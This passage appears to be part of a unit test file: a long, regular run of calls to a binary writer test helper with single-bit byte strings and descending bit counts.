_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 55, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 54, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 53, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 52, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 51, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 50, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 49, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 48, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 47, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 46, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 45, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 44, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 43, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 42, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 41, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 40, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 39, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 38, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 37, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 36, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 35, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 34, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 33, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 32, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 31, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 30, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 29, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 28, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 27, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 26, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 25, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 24, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 23, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 22, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 21, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 20, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 19, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 18, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 17, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 16, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 15, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 14, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 13, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 12, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 11, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 10, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 9, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 8, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 7, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 6, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 5, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 4, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 3, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 2, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 1, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 64, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 63, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 62, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 61, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 60, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 59, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 58, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 57, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 56, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 55, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 54, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 53, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 52, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 51, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 50, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 49, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 48, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 47, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 46, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 45, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 44, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 43, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 42, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 41, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 40, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 39, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 38, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 37, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 36, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 35, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 34, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 33, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 32, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 31, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 30, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 29, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 28, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 27, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 26, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 25, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 24, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 23, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 22, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 21, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 20, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 19, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 18, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 17, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 16, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 15, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 14, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 13, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 12, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 11, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 10, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 9, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 8, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 7, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 6, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 5, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 4, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 3, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 2, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 1, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 64, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 63, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 62, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 61, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 60, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 59, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 58, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 57, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 56, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 55, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 54, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 53, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 52, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 51, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 50, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 49, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 48, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 47, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 46, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 45, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 44, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 43, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 42, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 41, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 40, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 39, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 38, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 37, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 36, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 35, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 34, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 33, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 32, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 31, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 30, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 29, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 28, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 27, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 26, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 25, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 24, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 23, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 22, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 21, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 20, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 19, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 18, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 17, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 16, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 15, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 14, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 13, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 12, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 11, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 10, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 9, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 8, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 7, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 6, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 5, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 4, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 3, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 2, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 1, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 64, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 63, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 62, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 61, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 60, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 59, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 58, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 57, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 56, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 55, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 54, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 53, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 52, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 51, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 50, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 49, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 48, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 47, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 46, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 45, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 44, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 43, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 42, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 41, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 40, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 39, False, 1)
